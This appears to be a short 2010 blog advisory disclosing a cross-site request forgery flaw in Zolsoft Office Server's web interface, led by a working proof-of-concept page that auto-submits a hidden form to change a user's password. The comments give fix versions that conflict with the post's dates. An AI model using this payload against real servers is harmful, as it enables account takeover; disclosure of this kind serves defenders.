<html>
<body onload="document.forms[0].submit()">
<form action="http://localhost/options3.htm" method="post">
<input type="hidden" name="PassField1" value="new_password" />
<input type="hidden" name="PassField2" value="new_password" />
</form>
</body>
</html>
Thursday, May 6, 2010
Zolsoft Office Server Free Edition 2010.0502 XSRF
A cross-site request forgery vunlerability in the Zoloft Office Server Web UI can be exploited to change the password of a user.
Subscribe to:
Post Comments (Atom)
Version 2010.0120: Fixed the cross-site request bug in the Web service.
ReplyDeleteVersion 2010.0625: Fixed the cross-site request bug in the Web service.
ReplyDelete